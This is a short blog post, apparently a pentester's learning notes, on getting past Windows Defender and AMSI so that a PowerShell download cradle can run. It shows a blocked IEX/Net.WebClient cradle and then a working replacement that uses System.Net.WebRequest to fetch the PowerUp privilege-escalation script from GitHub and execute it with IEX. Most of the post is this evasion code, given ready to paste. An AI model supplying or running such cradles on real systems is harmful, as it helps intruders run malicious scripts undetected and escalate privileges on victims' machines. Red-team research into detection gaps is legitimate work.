Hi Folks,

I am writing this article to keep my notes while learning new ways of using PowerShell for Pentesting and Red teaming.

This post is about bypassing Microsoft Windows Defender and AMSI to download and execute the cradle for malicious powershell scripts ;). Will try to make this post as precise as I can.

While working with my educational research project, I have been trying to find the new ways to bypass the AMSI for executing the powershell scripts and commands which are considered to be malicious and flagged by Microsoft Windows Defender.

Just for note, Protection definitions are up to date:

I was trying to run PrivEsc enumeration script “PowerUp”

But as expected, the AMSI was awake already :P and it blocked me from running the cradle:

IEX(New-Object Net.WebClient).DownloadString(‘https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1’)

Defender blocked a well known IEX thing

So,

I thought to try it by using some other .NET classes other than Net.WebClient. I am not good at programming so googled, and found System.Net.WebRequest class.

Playing around for a while I came up with below script:

$webreq = [System.Net.WebRequest]::Create(‘https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Privesc/PowerUp.ps1’) $resp=$webreq.GetResponse() $respstream=$resp.GetResponseStream() $reader=[System.IO.StreamReader]::new($respstream) $content=$reader.ReadToEnd()

After setting all up, its as simple as IEX :P

IEX($content)

Final Execution of PowerUp script using System.Net.WebRequest

Thanks :) May be I come up with a shorter version of this.